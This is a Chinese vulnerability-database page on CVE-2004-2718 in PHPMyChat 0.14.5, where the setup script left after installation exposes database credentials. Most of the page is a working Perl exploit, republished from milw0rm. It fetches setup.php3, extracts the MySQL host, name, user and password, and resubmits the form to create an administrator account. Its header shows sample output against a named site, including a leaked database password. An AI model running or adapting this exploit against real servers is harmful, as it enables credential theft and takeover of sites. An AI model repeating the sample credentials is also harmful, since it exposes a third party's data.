@PHP PHP Heaven PHPMyChat 权限许可和访问控制漏洞
漏洞ID | 1108387 | 漏洞类型 | 权限许可和访问控制 |
发布时间 | 2004-12-22 | 更新时间 | 2004-12-31 |
CVE编号 | CVE-2004-2718 |
CNNVD-ID | CNNVD-200412-833 |
漏洞平台 | PHP | CVSS评分 | 4.3 |
|漏洞来源
|漏洞详情
安装PHPMyChat0.14.5版本安装后不能删除或保护setup.php3。攻击者可以借助直接请求获得包括数据库密码的敏感信息。
|漏洞EXP
####################################################################
#
# _____ _
# | ___| | _____ ___
# | |_ | |/ _ / / /
# | _| | | (_) V V /
# |_| |_|___/ _/_/
# Security Group.
#
# * phpMyChat remote sploit *
# by sysbug
#
# C:Perlbin>perl pmc.pl www.kublooddrive.com /chat
# /* Mysql dump :
# * C_DB_HOST : localhost
# * C_DB_NAME : jhawk_pchat1
# * C_DB_USER : jhawk_pchat1
# * C_DB_PASS : vvejTjeLgB
# *
# * Adding Admin ....
# * login:jhawk
# * pwd:owned
# */
# C:Perlbin>
#
# Credits: all my friends!
use IO::Socket;
if(@ARGV < 2){
usage();
}
main();
sub sock(){
$ock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp',Timeout=>10)|| die " * s0ck null -n";
print $ock "$pathrn";
print $ock "Accept: */*rn";
print $ock "Accept-Language: ptrn";
print $ock "Accept-Encoding: gzip, deflatern";
print $ock "User-Agent: l33t br0ws3rrn";
print $ock "Host: $hostrn";
print $ock "Connection: Keep-Alivernrnrn";
$path = '';
}
sub main(){
print "/*n";
print " * sploit remote phpMychatn";
print " * by sysbugn";
print " *n";
$host = $ARGV[0];
$folder = $ARGV[1];
$path = "GET $folder/chat/setup.php3?next=1 HTTP/1.1";
sock();
$result =1;
while($recv = <$ock>){
if($recv =~ /(C_DB_PASS|C_DB_USER|C_DB_NAME|C_DB_HOST)(.*)(VALUE=)(")(.*)(">)/){
$c++;
print " * Mysql dump :n" if($result);
print " * $1 : $5n";
$mysql[$c] = $5;
$result = '';
}
else{
print " * sploit failed! n";
print " *\ n";
exit;
}
}
close($ock);
$path = "GET $folder/chat/setup.php3?next=2&Form_Send=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1 HTTP/1.1";
sock();
while($recv = <$ock>){
if($recv =~ /(ADM_LOG)(.*)(VALUE=)(")(.*)(">)/){
$c++;
$mysql[$c] = $5;
}
}
close($ock);
$pwd="owned";
$path = "GET $folder/chat/setup.php3?next=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1&ADM_LOG=$mysql[5]&ADM_PASS=$pwd&Form_Send=3&Exist_Adm=1 HTTP/1.1";
sock();
if($mysql[5]){
print " *n * Adding Admin ....n * login:$mysql[5]n * pwd:$pwd n *\ n";
}
else{
print " * sploit failed! n";
print " *\ n";
}
close($ock);
}
sub usage(){
print "/*n";
print " * sploit remote phpMychatn";
print " * by sysbugn";
print " * usage: perl $0 xpl.pl <host>n";
print " * example: perl $0 xpl.pl www.site.comn";
print " * perl $0 xpl.pl www.site.com /chatn";
print " */n";
exit;
}
# milw0rm.com [2004-12-22]
|受影响的产品
Php Heaven Phpmychat 0.14.5
|参考资料
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/6D00S0KC0S.html
来源:SECUNIA
名称:11894
链接:http://secunia.com/advisories/11894
相关推荐: Moodle Remote Glossary Module SQL Injection Vulnerability
Moodle Remote Glossary Module SQL Injection Vulnerability 漏洞ID 1097652 漏洞类型 Input Validation Error 发布时间 2004-11-05 更新时间 2004-11-05…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666